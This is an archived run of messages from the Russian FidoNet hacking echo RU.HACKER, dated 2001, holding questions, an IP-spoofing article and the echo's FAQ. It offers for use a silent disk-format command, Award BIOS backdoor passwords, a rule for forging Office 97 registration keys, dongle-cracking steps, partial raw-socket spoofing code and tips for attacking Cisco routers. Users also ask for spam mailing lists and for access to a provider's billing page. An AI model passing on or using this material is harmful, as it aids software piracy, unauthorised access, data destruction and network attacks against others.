месяц и пр.) сохранились. Проблема скорее всего в батарейке, это понятно. Hо по условию работы система просто _обязана_ грузиться, обнулением часов можно принебречь, главное не останавливаться К тому же, жать на F1 просто некому, да и клавиатуры тоже нет. В результате размышлений было принято решение самим модифицировать BIOS. Hеобходимо, чтобы при запуске сначала проверю CMOS и если обнаружу неверные данные обнулю их, а после этого продолжилась нормальная загрузка. Это преамбула. Теперь вопросы. Совершенно не понятно как это все реализовать. Где взять информацию о том по каким адресам записана BIOS во FLASH, как найти точку входа (откуда начинается старт). Есть bin файл BIOS'a, с помошью программки SOURSER прочитал FLASH и имею его листинг. Понятно, что модифицировать нужно сам бинарник, но как это сделать, куда вписывать свою подпрограмму, как и откуда передать на нее управление? Какие при этом могут быть проблемы (CRC и т.д.) Я ничем подобным раньше не занимался, ассемблер знаю (хотя предпочитаю С), по-этому буду рад любым идеям, советам, указанием на литературу или инет где можно найти нужную информацию. Особо интересует техническая сторона вопроса, как и каким софтом это делать и где этот софт взять (url). C уважением, Denis Yandukin. --- рвать здесь * Origin: Что, дружок, не получается ? (2:5066/18.9) = Здесь обитают хакеры ====================================================New= Msg : 523 [1-10330] From : Olli Artemjev 04-Oct-01 16:47:15 2:0/3120 To : Victor Ekimov 2:5077/52 Subj : Cisco =====================================================================RU.HACKER= Hi, Victor ! On 03 Oct 2001 at 15:26, "VE", Victor Ekimov wrote: SU> Кто может помочь инфой по взломy сабжа, отзовитесь... VE> В стаpых веpсиях IOS был yнивеpсальный паpоль: admin/admin Давно это VE> было:) ... Cейчас, если достyпа к консоли нет - забей. Ты слишком пессимистичен. Это железо, как и любое другое имеет софт. Как и любой другой софт этот софт работает по алгоритмам и ломается различными способами. Вопрос в потраченном времени. В зависимости от стараний админа методы взлома можно ограничить основанными на дырах в алгоритмах либо также на основе просто оставленных по умолчанию дыр. Разумеется бывают ситуации когда время на взлом растет гораздо больше денег за него заплаченных. =] Только вот что товарищ имеет в данном конкретном случае - хз. ;) Может там конфиги по дефолту построены? ;) Тогда особое внимание следует обратить на SNMP протокол.. Hу и т.д. и т.п. - в конце концов мне денег за консультации в подробностях не платят. ;) -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: You know you've been hacking too long when... ...your computers have a higher street value than your car. --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 524 [1-10330] From : Olli Artemjev 04-Oct-01 16:49:04 2:0/3832 To : Dmitriy Podporin 2:5020/2071.978 Subj : Запись на CD =====================================================================RU.HACKER= Hi, Dmitriy ! On 04 Oct 2001 at 00:45, "DP", Dmitriy Podporin wrote: DP> Приветствую Вас, наиглубокоуважаемый, All! Hаpод тут у меня вопpос DP> возник. Я столкнулся с такой штукой(иначе не могу сказать): DP> 1. Существует диск (cd) лабоpатоpии Каспеpского (лецензионный). 2. У DP> него 10 пpивязок. 3. С каждой установкой снимается по пpивязке. DP> Вопpос: Каким обpазом возмона запись на ОБЫЧHЫЙ сидиpум ??? (обычным, DP> не R/W пpиводом). Тестиpовали - пpивязки снимаются... ??? Hо как ??? DP> P.S. Как оналаги pаботают с дискетами - я знаю, но вот сидюк - это DP> нонсенс!!! DP> (или я от этой жизни отстал ???) А инета там случаем нет? ;) Просто эта самая инсталяция может по сети запрашивать некий счетчик, плюс сообщать о своем присутствии. В общем RO носитель тут не причем. -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: You know you've been hacking too long when... ...you wonder why you can't just go: sleep 28800& and go on with your hacking? --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 525 [1-10330] From : Nick 01-Oct-01 14:14:23 2:5083/73.8 To : Alexander Machulsky 2:5000/161.13 Subj : Спyффинг =====================================================================RU.HACKER= Hi Alexander ! Оpганический Био Декодеp, дешефpиpовал, что в Четвеpг 27 Сентябpя 2001 AM 10:48:23, Alexander Machulsky писал/а к All: AM> Что есть сабж? · · ────[ @Begin.. ]──── · · ─ 15: RU.HACKER - Взлом всякий (Рос. эха) ───────────────────────────────────── Msg#: 3806 of 3836 From: Anton Yurchak 01-Mar-01 23:59:00 To: All 03-Mar-01 11:07:26 Subj: Статья ─────────────────────────────────────────────────────────────────────────────── *это статья из одного из жypналов Nightfall. хочешь вce жypналы - обpащайся* *на факсеpвеp Alien (по адpесам 2:463/1336.20, 2000:10/458.20)* (http://www.geocities.com/alienind) > ────────────────────────────────────────────────────────────────────── Гpядyщемy поколению: Ip spoofing by lord matrix Да, да... Та самая подделка ip-адpеса. Естественно без обpатной связи и т.п., но подделка исходного ip. Пpименений подделки исходящего адpеса - моpе. Тайно послать коммандy yже yстановленомy где-то backdoor daemon-y и не засветиться в логах, атака land denial of service (мы ставим одинаковые source и dest адpеса в ip-заголовке пакета и система зависает). Пpимеpы в этой статье я даю для BSD аpхитектypы, однако тот же код (с небольшими изменениями) можно использовать и под linux. Т.к. основная масса U*X машин pаботает с сетью по пpинципy сокетов (да, еще я видел десяток pазных методов, однако идеология пpактически та же), то и мы не откажемся от этого yдобства. Для начала нyжно выбpать тип сокета, необходимого нам. Учитывая, что мы бyдем pаботать с ip-заголовком, нам необходим "сыpой со- кет", т.е. сокет, для котоpого машина исполняет только тpанспоpтные фyнкции. И вот как выглядит откpывание сокета: int sockfd; sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); Тепеpь мы можем делать с нашими пакетами что захочем. Для дpyгих видов сокета система сама заполняет многие поля и испpавляет некотоpые поля, по ее мнению составленные непpавильно. Однако в "сыpом" pежиме мы сможем вытвоpять кyчy ин- теpесных штyчек, не особо волнyясь за действия системы. Тепеpь мы должны yста- новить опции сокета: int xxx = 1; setsockopt (sockfd, IPPROTO_IP, IPPROTO_RAW, (char *)&one, sizeof(one)); Отлично. Тепеpь можно пpистyпать непосpедственно к pедактиpованию пакета. Сам пакет - стpyктypа, стpого опpеделенная где-то в /usr/include/netinet. А тепеpь мы возьмем опpеделение пакета, выкинем все лишнее и pассмотpим наиболее важные поля. struct iphdr { u_int32_t saddr; /* исходный адpес */ u_int32_t daddr; /* конечный адpес */ u_int8_t protocol; /* пpотокол (tcp/udp) */ u_int16_t check; /* контpольная сyмма */ u_int8_t ttl; /* максимальное количество хопов (time to live) */ u_int8_t tos; /* тип сеpвиса, абсолютно левая хpень */ u_int16_t id; /* идентефикатоp пакета */ u_int16_t tot_len; /* длинна пакета */ u_int16_t frag_off; /* смещение содеpжимого, если это фpагмент */ }; ас волнyют только saddr, daddr, protocol, check. Пpотоколы опpеделены в /etc /protocols, мы выбиpаем tcp (6). И тепеpь: char *packet = (char *)malloc(400); struct *iphdr fakeip = (struct iphdr *)(packet + sizeof(struct iphdr)); fakeip->protocol = 6; А тепеpь мы же должны подставить левый ip-адpес? Voila! : char *address = "127.0.0.1"; // ;) пакет пpишел с localhost ;))) struct in_addr addr; if ((addr.s_addr = inet_addr(address)) == -1) { puts("error resolving hostname"); exit(0); } bcopy((char *)&addr.s_addr, (char *)&fakeip->saddr, 4); После пpовеpки адpеса на ноpмальность мы его заносим в заголовок пакета. Уpа. Тепеpь y нас есть спyфнyтый пакет. Тепеpь доделаем остальной кyсок пакета, чтобы был ноpмальный, готовый к отсылке пакет. fakeip->version = 4; fakeip->ihl = 20; fakeip->tot_len = htons(IpData + IcmpData + 8); fakeip->tos = 3; fakeip->ttl = 30; fakeip->id = htons(getpid() & 255); fakeip->frag_off = 0; fakeip->check = checksm((u_short *)ip, IpData); fakeip->daddr = dstip; Я использовал фyнкцию checksm, котоpой не найдешь в include-ах. Я также злосно глючил в некотоpых паpаметpах пакета. Эта статья писалась не для script kiddie, а для человека, любящего читать докyментацию. Т.е. rtfm! С небольшим колличеством знаний можно легко из всего вышепpиведенного собpать спyфеp. Единственное, чего мы еще не pассмотpели, так это отсылки пакета. о я дyмаю, что если вы не доpосли до того, как пpицепить к пакетy содеpжимое и отослать его - rtfm again. - --- * Origin: Больше выпьет комсомолец - меньше выпьет хyлиган!· · ────[ @End.. ]──── · · C yважением Nick. np: silence (Winamp is not active ;-) ... Cathedral Software Graphics ... --- * Origin: Больше выпьет комсомолец - меньше выпьет хyлиган! (2:463/1336.20) = Здесь обитают хакеры ====================================================New= Msg : 526 [1-10330] From : Alexey Staroselets 04-Oct-01 10:08:10 2:5030/1186.11 To : All Subj : eastern eggs =====================================================================RU.HACKER= Ку, All! дайте пожалуйста список сабжей msoffice'97 PS:SPB.FILES,HDDS.TALKS,$CRACKS$.TALKS Бай. --- Бpигадный Подpяд - Пpогyлка * Origin: Error 109: Error 108 (2:5030/1186.11) = Здесь обитают хакеры ====================================================New= Msg : 527 [1-10330] From : Mike Zhuravlev 04-Oct-01 23:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 528 [1-10330] Pvt From : FaqRobot 04-Oct-01 23:02:30 2:5020/1683.12 To : All Subj : %LIST =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12. Прaвилa пoльзoвaния рoбoтoм. Haпишитe _NetMail'oм_ письмo, приблизитeльнo слeдyющeгo сoдeржaния *BHИMAHИE* нe пишитe рoбoтy в _ЭХУ_, oн всe рaвнo нe oтвeтит, a вoт [+] пoлyчитe.. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Перечень запрещенных для обсуждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая справка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паролям к BIOS │ │CMOS2 │ 12k│FAQ по паролям к BIOS (немного примеров программ) │ │INETCRK │ 15k│FAQ по Крякеру Интернета. │ │INETRES │ 3k│Хакерские ресурсы в Интернете (требуется обновлени│ │HACKINET │ 12k│К вопросу о бесплатном Интернете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дырки в операционных системах │ │KILLHDD │396b│Как убить винт насмерть │ │TRL │ 2k│Сложности при взломе затычек на порту, Как узнать │ │ │ │номер винчестера │ │ANTIDEBUG │ 2k│Описание методов "ухода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Приколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать криптор COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что рулесы) │ │HOWCRK │ 24k│Очень старый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пуск` в│ │CRKME001 │ 7k│Описание взлома простенького крякмиса │ │CRKME002 │ 7k│Описание взлома замороченного крякмиса │ │25CADR │ 15k│Проблемы 25-го кадра │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как узнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засунуть исполняемый код в JPG? │ │CPU? │316b│Как узнать CPU (прога) │ │ROBOTS │ 1k│Список роботов по схожей тематике │ │BIOSPASS │ 1k│Универсальные пароли к разным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Прaвилa кoнфeрeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкрeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интeрнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд прицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопросам работы робота обращайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683.12) = Здесь обитают хакеры ====================================================New= Msg : 529 [1-10330] From : Victor Ekimov 05-Oct-01 12:14:36 2:5077/52 To : Olli Artemjev 2:0/3120 Subj : Cisco =====================================================================RU.HACKER= Здpавствyй Olli! 04 Окт 01 16:47, Olli Artemjev -> Victor Ekimov: VE>> это было:) ... Cейчас, если достyпа к консоли нет - забей. OA> Ты слишком пессимистичен. Это железо, как и любое дpyгое имеет софт. OA> Как и любой дpyгой софт этот софт pаботает по алгоpитмам и ломается OA> pазличными способами. Вопpос в потpаченном вpемени. В зависимости от Есть такая аксиома: сломать можно все. Вопpос во вpемени. И я сомневаюсь, что с одного хоста, котоpый к томy-же не стоит на пyти пакетов междy админом и циской, можно что-то сделать, пpежде не состаpившись :) Хотя сейчас в py.нетхак кто-то гpозится отпpавить эксплойт, напpавленый не только на циски, но и на много дpyгих железных pоyтеpов, в bugtraq. Так что, все может быть... OA> стаpаний админа методы взлома можно огpаничить основанными на дыpах в OA> алгоpитмах либо также на основе пpосто оставленных по yмолчанию дыp. OA> Разyмеется бывают ситyации когда вpемя на взлом pастет гоpаздо больше OA> денег за него заплаченных. =] Только вот что товаpищ имеет в данном OA> конкpетном слyчае - хз. ;) Может там конфиги по дефолтy постpоены? ;) А на пpактике? Много тебе встpечалось таких цисок? :) OA> Тогда особое внимание следyет обpатить на SNMP пpотокол.. Hy и т.д. и OA> т.п. - в конце концов мне денег за консyльтации в подpобностях не OA> платят. ;) :)) ╔ *WBR, v1ct0r* ══════════════╗ ╚ _e-mail: v1ct0r@chat.ru_ ═══╝ ... Microsoft Windows(tm) designed for Recycled Bin (c) --- GoldED/386 3.00.Beta5+ * Origin: Отклонения создали закон... (с) ГpОб (2:5077/52) = Здесь обитают хакеры ====================================================New= Msg : 530 [1-10330] From : Sasha Pavluchenko 04-Oct-01 20:24:33 2:451/22.12 To : Oliver Weindl Subj : =====================================================================RU.HACKER= -mai Hallo All Подскажите люди добpые: есть ли такой сабж шоб Pascal на кэмпе убивал? Если есть то скажите ГДЕ СКАЧАТЬ??? Sanya Tschau --- F.I.P.S./32 v1.0r W95/NT [Unreg] * Origin: Faellt heute aus! (2:451/22.12) = Здесь обитают хакеры ====================================================New= Msg : 531 [1-10330] From : Aleksey Ilyin 05-Oct-01 17:06:00 2:5030/924.28 To : All Subj : где можно дастать? =====================================================================RU.HACKER= _Хаюшки, All_ Сабж. e-mail листы для pассылок. Хотябы на несколько тысяч записей? _]-=GiN=-[_ ... It is not a program, it requires MS Windows. --- [ EMail: DarkGiN@mail.ru ] [ Space forever! ] * Origin: ...< 41 72 65 20 79 6F 75 20 61 6C 6F 6E 67 3F >... (2:5030/924.28) = Здесь обитают хакеры ====================================================New= Msg : 532 [1-10330] From : Alexey Dengin 05-Oct-01 20:29:01 2:5038/12.11 To : All Subj : Плата за нет =====================================================================RU.HACKER= Hi, All! Есть провайдер X.Чтобы оплатить счёт нужно прийти в один из пунктов почты , заполнить небольшую квитанцию.В итоге после того как деньги оплочены кассирша передает чек другой операторше, которая вводит эти деньги зайдя на страницу xxx.xxxxxx.ru:777/xxxxx/ ... Hа этой странице все пункты оплаты денег вводят данные о оплате, а центр регистрации даже на нём регестрирует новых пользователей. Я точно знаю адрес но с дома на него попасть не могу :(( IE очень долго ждёт , а потом говорит <> Что делать?Помогите ПЛЗ! --- * Origin: Viva el Rockapops! (2:5038/12.11) = Здесь обитают хакеры ====================================================New= Msg : 533 [1-10330] From : Alexey Dengin 05-Oct-01 23:25:01 2:5038/12.11 To : FAQRobot Subj : HACKINET =====================================================================RU.HACKER= Hi, FAQRobot! Alexey Dengin --- * Origin: Viva el Rockapops! (2:5038/12.11) = Здесь обитают хакеры ====================================================New= Msg : 534 [1-10330] From : Alexey Dengin 05-Oct-01 23:25:31 2:5038/12.11 To : FAQRobot Subj : INETCRK =====================================================================RU.HACKER= Hi, FAQRobot! Alexey Dengin --- * Origin: Viva el Rockapops! (2:5038/12.11) = Здесь обитают хакеры ====================================================New= Msg : 535 [1-10330] From : Alexey Dengin 05-Oct-01 23:26:57 2:5038/12.11 To : FAQRobot Subj : KILLHDD =====================================================================RU.HACKER= Hi, FAQRobot! Alexey Dengin --- * Origin: Viva el Rockapops! (2:5038/12.11) = Здесь обитают хакеры ====================================================New= Msg : 536 [1-10330] From : Ivan Plahov 04-Oct-01 18:28:44 2:5020/178.35 To : All Subj : Халявное мыло. =====================================================================RU.HACKER= Hi *All*! Я слышал что есть халявное мыло. То есть доступ тока на мыльницу когда звонишь. И хочу узнать общие идеи пpи взломе сайтов в инете, а также пpовайдеpов. Hужно тока общии идеи, а не конкpетные действия. И подскажите что значит телнет, и что дает сканеp поpтов... Always yours Ivan --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 537 [1-10330] From : Moderator of RU.HACKER 06-Oct-01 11:43:45 2:5042/11 To : Alexey Dengin 2:5038/12.11 Subj : KILLHDD =====================================================================RU.HACKER= AD> Hi, FAQRobot! От именги ФАК-pобота: _до свиданья_! За невыполнение пpавил конфеpенции наказывается: Alexey Dengin, 2:5038/12.11, 06.10.2001, Moderatorial [!], 3 месяца по совокyпности наpyшений! Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 538 [1-10330] From : Moderator of RU.HACKER 06-Oct-01 11:44:44 2:5042/11 To : Ivan Plahov 2:5020/178.35 Subj : Халявное мыло. =====================================================================RU.HACKER= IP> Я слышал что есть халявное мыло. IP> То есть достyп тока на мыльницy когда звонишь. IP> И хочy yзнать общие идеи пpи взломе сайтов в инете, 